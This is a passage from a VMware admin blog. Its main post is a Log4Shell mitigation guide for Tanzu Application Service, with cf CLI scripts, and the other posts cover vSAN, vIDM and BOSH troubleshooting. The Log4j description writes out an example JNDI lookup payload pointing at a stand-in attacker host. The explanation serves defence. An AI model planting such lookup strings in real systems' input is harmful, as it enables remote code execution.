The Fluffy Admin

Spoke at the VMUGNL 2021

Thefluffyadmin — Mon, 11 Apr 2022 16:56:12 +0000

VMUGNL - Differences between TKG versions

Late last year, I spoke at the VMUGNL about the differences between the TKG flavors (TKGi, TKGm and TKGs) as they existed at the end of 2021.

The talk is in Dutch (which is quite rare for me).

Log4j Security Vulnerabilities CVE-2021-44228 – Mitigation Strategies for Tanzu Application Services Operators

Thefluffyadmin — Wed, 15 Dec 2021 19:08:25 +0000

This post was created by the VMware Tanzu Vanguard community. (https://tanzu.vmware.com/vanguard)
This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated) customers and partners. This community is led by the incomparable Brian Chang --> https://twitter.com/techadvoguy
While I am mentioned in the credits.. I really only contributed the xkcd image :p

------------

Log4j Security Vulnerabilities CVE-2021-44228 - Mitigation Strategies for TAS Operators

By the Tanzu Vanguard community - key contributors: Simmy Xavier, Charles Lester, Juergen Sussner, Jonathan Regehr & Robert Kloosterhuis

Summary Brief:

Apache Log4j is a very widely used logging library for Java. A vulnerability in it, named Log4Shell, is tracked officially as CVE-2021-44228 (a second one is tracked as CVE-2021-45046). The vulnerability allows RCE (Remote Code Execution) attacks, which significantly increases the risk of exploitation. Attackers could use it to plant malicious code for crypto mining or information extraction. There are reports of increased scanning across the Internet to identify vulnerable systems and infect them with malware or ransomware. The issue was discovered as early as Dec 1st by Chen Zhaojun of the Alibaba Cloud Security Team and affects log4j-core v2.0 through v2.14.1. Apache released v2.15.0 as of Dec 5 and v2.16.0 as of Dec 14. The vulnerability has a severity rating of 10 out of 10 and has been treated as a zero-day since it was publicly disclosed on Dec 10.

Description:

If you have a system that uses log4j and you can get that system to log a string containing a JNDI lookup (for example ${jndi:ldap://attacker.example/a}), log4j will resolve the lookup, and that can make it load and execute code from a server the attacker controls.

The simplest example is a Minecraft server: it logs every chat message that is sent, so if you put a malicious lookup string in a chat message, log4j will act on it as it logs the message.
The TAS platform itself uses a vulnerable Log4j library in the TAS tile and in some of the other tiles. Apps built with the Java buildpack may also pull in vulnerable libraries.

CISA is not able to confirm that merely using a newer JRE is sufficient for protection. See the discussion on the oss-security mailing list at http://www.openwall.com/lists/oss-security/2021/12/10/3. In the meantime, it has also been confirmed that a modified version of this exploit is not restricted to a specific JVM version.

Full remediation requires the use of log4j >= 2.16.0. The mitigation strategies merely reduce the attack surface area but do not fully protect against the threat.

Mitigation strategies for TAS

For systems running log4j >= 2.10.0 (thanks, Simmy Xavier!):

One approach is to set the LOG4J_FORMAT_MSG_NO_LOOKUPS variable in the running environment variable group, reflected in example (1) below. The limitation to this approach is that “Any user-defined variable takes precedence over environment variables provided by these groups.”
Another approach is to place the variable in the environment of every app, reflected in example (2) below. The limitation to this approach is that a subsequent restage of the application will cause the variable to be lost.
Instead of setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS, you can also add -Dlog4j2.formatMsgNoLookups=true to the JAVA_OPTS variable.
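A minimal sketch of the JAVA_OPTS variant, in case it helps. The helper name with_no_lookups and the app name my-app are made up for illustration, and it assumes you have already looked up the app's current JAVA_OPTS value yourself (for example via cf env). It only appends the system property when it is not already there, so existing options are kept:

```shell
# Hypothetical helper (not part of the cf CLI): prints the given JAVA_OPTS
# string with the log4j2 "no lookups" system property appended, unless the
# property is already present.
with_no_lookups() (
  current="$1"
  flag="-Dlog4j2.formatMsgNoLookups=true"
  case " $current " in
    *" $flag "*) printf '%s\n' "$current" ;;        # already set: leave unchanged
    "  ")        printf '%s\n' "$flag" ;;           # JAVA_OPTS was empty
    *)           printf '%s\n' "$current $flag" ;;  # append to existing options
  esac
)

# Example usage (my-app is a placeholder app name):
#   cf set-env my-app JAVA_OPTS "$(with_no_lookups '-Xmx512m')"
#   cf restart my-app --strategy rolling
```

As with the environment variable, this only helps for log4j >= 2.10.0 and it is a mitigation, not a fix.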

For any systems running log4j 2.*:

The more comprehensive mitigation strategy is to remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)

For older 1.x versions:

Although 1.x does not seem to be affected by this, it is an old version that has been out of support for a very long time and may be vulnerable to various other problems. Log4j 1.x should therefore also be considered for an update. Depending on the app, this can be achieved fairly simply by using the API bridge described here: https://logging.apache.org/log4j/2.x/manual/migration.html

Example mitigation strategies for TAS running log4j >= 2.10.0 (thanks to Simmy Xavier):

1. Set the running environment variable group (see https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups) (restart requires CLI >= 7). Note: if you already have running environment variables, you need to include them in the srevg command, because the command expects to receive all the variables for the group; it sets the revg to only what you specify:

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

cf restart <app-name> --strategy rolling

2. Set the environment variable for a particular app (restart requires CLI >= 7):


cf set-env <app-name> LOG4J_FORMAT_MSG_NO_LOOKUPS true

cf restart <app-name> --strategy rolling

3. Script to loop through all apps in a space, apply the change in (2) and restart the app (restart requires CLI >= 7):

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName

do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; 

cf restart $appName --strategy rolling

done

4. Script to apply the change in (1), then loop through every app in every space in every org, and restart the app (restart requires CLI >= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):

# Applies the fix, then runs through every space in every org, and restarts every app

# Note that “Any user-defined variable takes precedence over environment variables provided by these groups.”

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf restart $app --strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done
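If you want to exclude certain orgs, spaces or apps from loops like the one above, one way is a small membership check. This is only a sketch: the function name is_excluded and the EXCLUDED_ORGS list are assumptions for illustration ("system" is the org Cloud Foundry uses for platform components, "sandbox" is a made-up example).

```shell
# Hypothetical exclusion list, space-separated. Adjust to your foundation.
EXCLUDED_ORGS="system sandbox"

# Hypothetical helper: succeeds (exit 0) when name $1 occurs in the
# space-separated list $2, and fails (exit 1) otherwise.
is_excluded() {
  case " $2 " in
    *" $1 "*) return 0 ;;
    *)        return 1 ;;
  esac
}

# Example usage as the first line inside the org loop:
#   is_excluded "$org" "$EXCLUDED_ORGS" && continue
```

The same check works for spaces and apps with their own lists. Matching is on whole names only, so excluding "system" does not also exclude an org called "system-test".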

5. Script to loop through every app in every space in every org, apply the change in (2) and restart the app (restart requires CLI >= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):

# Runs through every space in every org, applies the (temporary) fix, and restarts the app

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf set-env $app LOG4J_FORMAT_MSG_NO_LOOKUPS true

                     cf restart $app --strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done

Hint:

When using cf restart <app-name> --strategy rolling, the rolling restart uses a TAS feature called deployments, which requires new app instances to be started while the old ones are still running. This needs some spare org quota; in other words, a rolling restart will fail in an org that has no quota left.

Apache mitigation recommendations

Apache's recommendations, located at https://logging.apache.org/log4j/2.x/security.html, depending on the version of log4j2, are:

Log4j version	Mitigation Plan
2.16.0	Nothing
2.15.0	Upgrade to 2.16.0
2.10.0 - 2.14.1	Upgrade to 2.16.0 OR Set environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true" OR Set system property "log4j2.formatMsgNoLookups" to "true"
2.0 - 2.9.1	Upgrade to 2.16.0 OR Remove JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
1.x	Log4j 1.x is no longer supported at all, and a bug related to Log4Shell, dubbed CVE-2021-4104, exists in this version
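The table above can be turned into a small lookup, which is handy when you have a list of versions from a scan. This is a sketch only: the function name log4j_mitigation is made up, it reflects nothing more than the table as it stands in this post, and it treats everything from 2.16.0 upwards as "nothing to do", which is an assumption based on the ">= 2.16.0" remediation statement earlier in the post.

```shell
# Hypothetical helper: prints the mitigation plan from the table above
# for a given log4j version string such as "2.14.1".
log4j_mitigation() (
  version="$1"
  case "$version" in
    *.*) ;;                               # need at least major.minor
    *)   echo "unknown"; exit 1 ;;
  esac
  major=${version%%.*}
  rest=${version#*.}
  minor=${rest%%.*}
  minor=${minor%%[!0-9]*}                 # drop suffixes such as "-beta9"
  case "$major" in
    1) echo "unsupported: migrate off 1.x (see CVE-2021-4104)"; exit 0 ;;
    2) ;;
    *) echo "unknown"; exit 1 ;;
  esac
  [ -n "$minor" ] || { echo "unknown"; exit 1; }
  if [ "$minor" -ge 16 ]; then
    echo "nothing to do"
  elif [ "$minor" -eq 15 ]; then
    echo "upgrade to 2.16.0"
  elif [ "$minor" -ge 10 ]; then
    echo "upgrade to 2.16.0, or set LOG4J_FORMAT_MSG_NO_LOOKUPS=true, or set -Dlog4j2.formatMsgNoLookups=true"
  else
    echo "upgrade to 2.16.0, or remove JndiLookup.class from the classpath"
  fi
)

# Example usage:
#   log4j_mitigation 2.14.1
```

Always check Apache's security page for the current recommendations before relying on a lookup like this.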

Several VMware products, along with products from other vendors, use this popular framework, and the vendors are actively working on releasing workarounds and/or patches. The affected VMware products and the status of their patches and workarounds are listed in the Security Advisory at https://www.vmware.com/security/advisories/VMSA-2021-0028.html

Based on the blog on Spring.io (https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot), Spring Boot users are only impacted if they have switched the default logging system to log4j2.

A workaround until a patch can be applied across the TAS foundation is to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. This can be done at a global level or at an app level, but in either case a restart is required for it to take effect.

Setting at Global level - cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

Setting at an App Level - cf set-env <app-name> LOG4J_FORMAT_MSG_NO_LOOKUPS true

Restart the app instances in a rolling fashion (requires cf CLI v7+) - cf restart <app-name> --strategy rolling

Validating the change - cf env <app-name> | grep LOG4J

Other useful scripts

Script to set environment variable (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; done

Script to perform Rolling restart (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf restart $appName --strategy rolling; done

Script to validate (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf env $appName | grep LOG4J ; done

How TAS as immutable infrastructure helps

Despite all the mitigation strategies, there is still a risk that some remote code got dropped into a running container. To cope with that proactively, you can use the fact that TAS recreates containers from an immutable source image (the droplet). So why not run the restart scripts above on a regular basis, to keep wiping out anything that got into a container?

Monitoring app changes on TAS

Patching TAS is essential, and securing your apps should be the first priority. But you may also want to know how your apps are behaving and whether they have any vulnerable versions inside their containers. To find out, you can set up a search job that inspects all running containers.

The following script can be run as a task in TAS:

API=`echo $VCAP_APPLICATION | jq -r ".cf_api"`




cf login -a $API -u $USER -p $PASSWD -o dummyorg -s dummyspace

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [ $rc -eq 0 ]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do 

                     log4jversion=`cf ssh "$app" -c "cd /app; find -iname '*$PATTERN*'" |tr '\n' ' '` 

                     rc=$?

                     if [ $rc -eq 0 ]

                     then

                        if [ -z "$log4jversion" ]

                            then

                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not found"

                            else

                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=$log4jversion"

                        fi 

                     else 

                        echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not-ssh-able"

                     fi

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done

This script will ssh into every container running on TAS and search its filesystem for log4j versions. You can use the TAS scheduler (https://network.pivotal.io/products/p-scheduler/) to run this task once a day.
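If you do not have a log management system at hand, the file list the scan produces can also be reduced to version numbers in the shell. The sketch below is an illustration only: the function name log4j_core_versions is made up, and it assumes the scan was run with PATTERN set to something like log4j-core, so that the list contains file names of the form log4j-core-<version>.jar.

```shell
# Hypothetical helper: reads a space- or newline-separated list of file paths
# on stdin and prints the distinct log4j-core versions found in it,
# comma-separated on one line.
log4j_core_versions() {
  tr ' ' '\n' \
    | sed -n 's/.*log4j-core-\([0-9][^/]*\)\.jar$/\1/p' \
    | sort -u \
    | paste -sd, -
}

# Example usage with the variable from the scan script:
#   echo "$log4jversion" | log4j_core_versions
```

Other jars, such as log4j-api, are ignored on purpose, because the vulnerable JndiLookup class lives in log4j-core.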

The Log output can be forwarded to any Log Management System which allows you to create a “real time” dashboard.

If you use Splunk, the query would be:

index= cf_app_name=AdminScripts event_type=LogMessage 

| rex field=msg  "ORG=(?<orgname>.*)   SPACE=(?<spacename>.*)   APP=(?<appname>.*) LOG4JVERSION=(?<testresult>.*)" 

| eval files=split(testresult," ")

| rex field=files "log4j-core-(?<log4jversion>.*).jar"

| eval log4jversion=mvjoin (mvsort(mvdedup(log4jversion)), ",")

| table orgname, spacename, appname, log4jversion, files

| sort log4jversion desc

This creates a nice visualization like this

With this, you get an overview of which app uses which version. As you can see in this example, there are sometimes “hidden” versions, or more than one version within an app, because agents such as the AppDynamics agent bring their own version.

Patching apps the hard way…

You may also face apps that refuse to be patched because there is no source code available or no pipeline or for whatever reason. In this case, you can try the following approach to patch such apps.

```
cf app vulnerableApp --guid
```
```
cf curl /v3/apps/<app-guid>/packages
```

Copy the download link from the links section

```
cf oauth-token 
```

curl -L <download-link> --header "Authorization: <oauth-token>" -o app.zip

Now patch whatever needs to be patched in the app.zip

```
cf create-app-manifest vulnerableApp
```

cf push fixedApp -f vulnerableApp_manifest.yml -p app.zip

```
cf stop vulnerableApp
```

This will deploy a second, patched version alongside the vulnerable app with the same settings, effectively having a blue-green deployment of a patched and a vulnerable app.

Appendix:

How to detect the Log4j vulnerability in your applications: https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html
Apache Log4j Security Vulnerabilities: https://logging.apache.org/log4j/2.x/security.html
URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability:
https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228
National Vulnerability Database for CVE-2021-44228 (with some excellent links): https://nvd.nist.gov/vuln/detail/CVE-2021-44228
National Vulnerability Database for CVE-2021-45046 (with some excellent links): https://nvd.nist.gov/vuln/detail/CVE-2021-45046
CISA guidance https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
LunaSec blog post (Thanks Jonathan Regehr!): https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
Cloud Foundry post: https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/
VMware advisory: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
VMware KB on products not affected: https://kb.vmware.com/s/article/87068
BlueTeam CheatSheet, Advisories by all vendors
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

And when you need a laugh: https://log4jmemes.com/

Mysterious vSAN datastore alert – and the relationship between First-Class disks and Cloud-Native storage

Thefluffyadmin — Fri, 27 Aug 2021 15:56:57 +0000

Aug 27th, Robert Kloosterhuis

-----------

I ran across an interesting vSAN alarm today that baffled me. This is vSphere 6.7 Update 3L (6.7.0.46000).

Improved virtual disk infrastructure namespaces storage policy (alarm)

So this is referring to the config setting we can find under Storage --> vSAN Datastore object --> Configure --> General

This is a config setting that was introduced.. uhh.. somewhere.. but I could not find any reference or documentation about it.

There is no mention of the policy setting at all in the official docs for 6.7 or 7.0 ( https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html ) .

I suspect the alarm is being triggered in our case, because, as you can see from the screenshot, the setting was 'blank'. I assume that in this case, it would revert to its default previous behaviour; to inherit the set VM Default Storage policy. I am not sure about this though.. what would be the point of the alarm then?

But the wording between this config setting, and the warning, is all slightly different, so I am not sure.

'Home Storage Policy' vs 'Improved Virtual Disk Home Storage Policy' vs 'Improved virtual disk Infrastructure Namespaces Storage policy (alarm)'

So what is this referring to anyway??

Cormac Hogan has a nice set of blog articles on this:

A primer on First Class Disks/Improved Virtual Disks

and:

https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/

So Cormac's blog post is from 18 months ago. Has, in the meantime, VMware settled on a standard name for these things?

First Class Disks (FCD)
Improved Virtual Disk (IVD)
Managed Virtual Disks
Enhanced Virtual Disks

It seems not, because while the vSphere 6.7 web client refers to these things as 'Improved Virtual Disks', the vSAN/CNS part of VMware still calls them 'First-Class Disks', or FCDs for short.
But there is no mention of IVDs anywhere in the core vSAN docs (I did a search across the 4 PDFs). It's a shame, because this is pretty interesting technology.
Ironically, they are mentioned far more in the vRealize 8 documentation. Here are some links:

https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html
https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html
https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html

Here is a mention of them, in regards to how they are used in Cloud Native Storage (or CNS). And in fact, this CNS use appears to be the primary use-case of FCD's being added to vSphere in the first place. But good luck finding that out :p

https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage

Persistent Volumes (PV) are created in vSphere as First-Class Disks (FCD). FCDs are independent disks with no VM attached. With the release of vSphere 7.0 U2, we are adding snapshot support of up to 32 snapshots for FCDs. This enables you to create snapshots of your K8s PVs which goes along with the SPBM multiple snapshot rules.

More information on the vSphere CSI is here:
https://vsphere-csi-driver.sigs.k8s.io/

This is actually pretty important.. if in the vSphere CSI (Container Storage Interface) for Kubernetes, Persistent Volumes are FCD objects... and you can be in a situation where there is no default policy applied to them in vSAN.. then.. uhh.. they are NOT protected. Right?

Well.. no .. because even if this config setting is left blank, CNS objects seem to inherit the default storage policy set for the vSAN datastore. I double checked:

So to my mind.. that makes the alert message... well.. pointless?

It should be noted that in vSphere with Tanzu (TKGs), the storage policy for these kinds of objects is handled quite differently. The vSAN storage policy is, in that case, associated with the vSphere Namespace.

Here are some slides I made that explain how that works:

Up to today, the vCenter alarm (Improved virtual disk infrastructure namespaces storage policy alarm) was completely ungooglable. That is the main reason for this blog post now existing.

But I hope this simultaneously explains a bit about what these 'Improved Virtual Disks' are all about. I was a little shocked at how little official documentation there is around this from VMware.

Speaking about Tanzu Kubernetes Grid at VMWorld2021 Code Connect and the UK- North West England VMUG!

Thefluffyadmin — Fri, 20 Aug 2021 10:36:28 +0000

Aug 20th, Robert Kloosterhuis

It's been a very Tanzu year for me. After my 'Tanzu for ~~Dummies~~ Beginners' session (and CMTY Podcast appearance), I am continuing to do some public speaking about Tanzu topics in the coming months!

I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu Kubernetes Grid that VMware currently has available: TKGi (ex Pivotal PKS), TKG(m), and TKG(s) (aka 'vSphere with Tanzu') and the differences between them. I am gonna deep dive into each version, look at how they are deployed, how they are used, and compare the configuration and design choices you will face with each.

VMworld 2021 Code Connect - The State of the TKG Art [CODE2780] - Oct 5

Via the VMware{code} Program, (in which I am a Code Coach) , and the Code Connect event that is attached to VMworld2021 this year, I have a session that you can find in the VMworld scheduler!

Use this search string to find it:

https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg, or just look for CODE2780

I would also like to highlight the Session by Scott Rosenberg, Adding Custom Logic to TKG Cluster Deployment [CODE2749]

UK- North West England VMUG - Sep 9

Nathan Byrne (@Vm_nathbyrne) very graciously invited me to speak at the UK North West VMUG (@NWEnglandVMUG).

Sign-up for it here:
https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ

vIDM Elasticsearch failing due to idm plugin messing with node count – hard fix

Thefluffyadmin — Mon, 29 Mar 2021 17:43:02 +0000

Robert Kloosterhuis, march 29, 2021

I ran into a strange issue with a vIDM 3.3.2.0 appliance today

(vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access')

The issue I had involved a single-node deployment.

This is an important detail. vIDM can be clustered, and that means that many of the services it runs inside (RabbitMQ, Elasticsearch) can also be clustered. The 'fix' I describe in this post (actually more of a workaround), should only ever be attempted on a single-node deployment. It will break the ability to make your vIDM install clustered. This is unsupported and totally at your own risk.

The issue was this:

I was getting frequent errors in the vIDM user interface, referencing the Analytics service.

"Call to Analytics failed with status: 500"

The Analytics service is, basically, a local installation of Elasticsearch, included on the vIDM appliances. And clustered if you have more than 1 vIDM node.

I don't have any screenshot myself, but this post also nicely demonstrates what you would see in the vIDM Health Dashboard:

https://geekcubo.com/vmware-identity-manager-cluster-19-03-elastic-search-service-issues/

Basically the 'Integrated Components' check in the Health Dashboard would be red. But in my case, no data at all was being produced by Elasticsearch. All the values were 'unknown'.

To troubleshoot, we need to ssh into the vIDM VM, with the local 'sshuser' account. And then sudo to root.

When I tried to troubleshoot, it was obvious that I could not even get into the Elasticsearch API at all. It was throwing nothing but error 500's

curl 'http://localhost:9200/_cluster/health'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

curl -XGET 'http://localhost:9200/_cat/indices?v'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

The elasticsearch log can be found here: /opt/vmware/elasticsearch/logs/horizon.log

I tailed it, and gave elasticsearch itself a restart

service elasticsearch restart

Stopping elasticsearch: process in pidfile `/opt/vmware/elasticsearch/elasticsearch.pid'done.
horizon-workspace service is running
Waiting for IDM: Ok.
Number of nodes in cluster is : 1
Configuring /opt/vmware/elasticsearch/config/elasticsearch.yml file

I then tried to ask its health status a few times while it started, to see if it came up at all.

Briefly, it did, before it died again!


curl 'http://localhost:9200/_cluster/health?pretty'
{
"cluster_name" : "horizon",
"status" : "yellow",
"timed_out" : false,
"number_of_nodes" : 1,
"number_of_data_nodes" : 1,
"active_primary_shards" : 60,
"active_shards" : 60,
"relocating_shards" : 0,
"initializing_shards" : 0,
"unassigned_shards" : 60,
"delayed_unassigned_shards" : 0,
"number_of_pending_tasks" : 0,
"number_of_in_flight_fetch" : 0,
"task_max_waiting_in_queue_millis" : 0,
"active_shards_percent_as_number" : 50.0
}

When I examined the log, I saw pretty quickly why I was getting an error 500.

It shows Elasticsearch starting normally. It then discovers it has 244 indices to clean up (more on that later), so it sets health to yellow. But that is fine. At least it's not a complete fail.

But then something odd happens.

Something called 'com.vmware.idm.elasticsearch.plugin' makes an appearance and starts, somehow, messing with the node count that Elasticsearch itself maintains for its cluster.

This VMware KB kind of explains what might be going on here https://kb.vmware.com/s/article/74709 , though it references a similar, but different error, actually a timing situation involving a cluster consisting of more than 1 node.

The point though, is this:

'com.vmware.idm.elasticsearch.plugin' is a

plugin for elasticsearch that asks IDM for the list of nodes that are expected to be in the cluster. It uses that list to determine how many nodes it should be able to see before a primary can be elected and the cluster formed.

Seems logical: Elasticsearch can't know by itself what kind of cluster topology you built with vIDM, but vIDM knows.

Based on the log, what seemed to be happening is that Elastic starts normally, it loads in its config from

/opt/vmware/elasticsearch/config/elasticsearch.yml

This config includes how many cluster nodes are expected (in my case, just 1, cause there is no cluster).

But then, for some reason, the idm plugin tries to update the running cluster count again and here something goes wrong. The elastic cluster service, ends up removing its only node, and then of course, Elastic service dies. The next message is that the cluster service can no longer connect.

I have no idea why this is happening. And it was pretty consistent. Every time I restarted the Elastic Service or rebooted the VM. The config for the IDM plugin is also contained in /opt/vmware/elasticsearch/config/elasticsearch.yml , but it doesn't keep its own nodecount value, so I am not sure why it thinks it can safely tell the cluster service to remove the only node for whatever reason.

Anyway, the workaround here, is pretty straightforward; simply disable the IDM plugin by setting the 'discovery.zen.idm.enabled' value to false. ( in /opt/vmware/elasticsearch/config/elasticsearch.yml )
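For what it is worth, the edit itself can be scripted. The sketch below is just that, a sketch: the function name disable_idm_discovery is made up, and it assumes the setting sits on its own line in the form "discovery.zen.idm.enabled: <value>". It keeps a .bak copy next to the file and returns a non-zero exit code when the key was not found, so you can tell if nothing was changed.

```shell
# Hypothetical helper: sets discovery.zen.idm.enabled to false in the given
# elasticsearch.yml and keeps the original as <file>.bak.
disable_idm_discovery() (
  config="$1"
  [ -f "$config" ] || { echo "no such file: $config" >&2; exit 1; }
  cp -p "$config" "$config.bak" || exit 1
  # Assumption: the key is on a single line as "discovery.zen.idm.enabled: <value>".
  sed 's/^\([[:space:]]*discovery\.zen\.idm\.enabled[[:space:]]*:\).*/\1 false/' \
    "$config.bak" > "$config" || exit 1
  # Exit status tells the caller whether the setting is now actually false.
  grep -q '^[[:space:]]*discovery\.zen\.idm\.enabled[[:space:]]*:[[:space:]]*false' "$config"
)

# Example usage (as root on the vIDM appliance):
#   disable_idm_discovery /opt/vmware/elasticsearch/config/elasticsearch.yml \
#     && service elasticsearch restart
```

Writing back through a redirect rather than replacing the file keeps the original file's ownership and permissions intact.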

Obviously this is unsupported, so do this at your own risk. If you ever expand the vIDM installation into a cluster, that will obviously break now, so you will have to turn this back on again. At that point, perhaps best to raise a VMware support ticket around this.

Bonus: Cleaning up unassigned shards

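If your health stays yellow due to a number of 'unassigned shards' hanging around forever, you can force-delete them with the following one-liner. Be aware that it deletes every index that has an unassigned shard, including the data in that index: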

curl -XGET http://localhost:9200/_cat/shards | grep UNASSIGNED | awk {'print $1'} | xargs -i curl -XDELETE "http://localhost:9200/{}"
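Because the one-liner is destructive, it can be worth doing a dry run first. A minimal sketch, assuming the default column order of the _cat/shards output (index, shard, prirep, state, ...); the function name unassigned_indices is made up for illustration:

```shell
# Hypothetical helper: reads `_cat/shards` output on stdin and prints the name
# of every index that has at least one UNASSIGNED shard, each name once.
unassigned_indices() {
  awk '$4 == "UNASSIGNED" { print $1 }' | sort -u
}

# Example usage (lists only, deletes nothing):
#   curl -s 'http://localhost:9200/_cat/shards' | unassigned_indices
```

Matching on the state column instead of grepping the whole line avoids false hits, and sort -u means each index shows up once even when several of its shards are unassigned.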

Guest on the VMware Community Podcast – and my upcoming Tanzu VMware{code} session

Thefluffyadmin — Thu, 25 Mar 2021 12:02:19 +0000

Robert Kloosterhuis; https://thefluffyadmin.net/ , 25march2021

Had an excellent time on the #vmware #vcommunity podcast with last night.

Full recording here:

My upcoming VMware{code} session on Tanzu for Beginners, for the 9th of April, is here: blogs.vmware.com/code/2021/03/0

#tanzu #itqlife

Useful Bosh Oneliner to restart something on a bunch of TKGi nodes.

Thefluffyadmin — Tue, 02 Mar 2021 17:56:48 +0000

Robert Kloosterhuis, 2 march 2021

Found myself in a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi (PKS) Kubernetes cluster.

Fluentd is managed through Monit, and you can run a command through the Bosh ssh command. In this case: sudo monit restart fluentd

So one of the customer admins, who is way more fluent in bash than me, made this:

bosh -e <env> -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa vms | \
awk '{print "bosh -e <env> -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa ssh "$1" -c \"sudo monit restart fluentd\""}' \
> start-fluentd.sh

And then simply check and run start-fluentd.sh
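A slightly more reusable take on the same idea, as a sketch only. The function name gen_restart_commands is made up, and the environment alias, deployment name and job name are passed in as parameters instead of being hard-coded. It also skips any line whose first column does not look like an instance name (group/id), which is an assumption about what the bosh vms output may contain besides the instances themselves.

```shell
# Hypothetical helper: reads `bosh vms` output on stdin and prints one
# "bosh ssh ... monit restart" command per instance line.
#   $1 = BOSH environment alias, $2 = deployment name, $3 = monit job name
gen_restart_commands() {
  awk -v env="$1" -v dep="$2" -v job="$3" '
    index($1, "/") > 1 {
      printf "bosh -e %s -d %s ssh %s -c \"sudo monit restart %s\"\n", env, dep, $1, job
    }'
}

# Example usage (my-env and my-deployment are placeholders):
#   bosh -e my-env -d my-deployment vms \
#     | gen_restart_commands my-env my-deployment fluentd > start-fluentd.sh
```

As before, read through the generated script before you run it.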

Troubleshooting Certificate mismatch in Harbor in TKGi

Thefluffyadmin — Wed, 24 Feb 2021 10:21:49 +0000

I recently deployed Harbor for a customer. This is the version of Harbor that has been pre-packaged into a 'Tile', for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Service [PKS]).

The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a nice interface where you can set up all the essential settings for Harbor.

One of the things you can set, is the certificate to be used by Harbor.

In this case, we had the customer generate a certificate for us, for Harbor. The bottom field is meant for the certificate of the Certificate Authority, that generated the Harbor certificate.

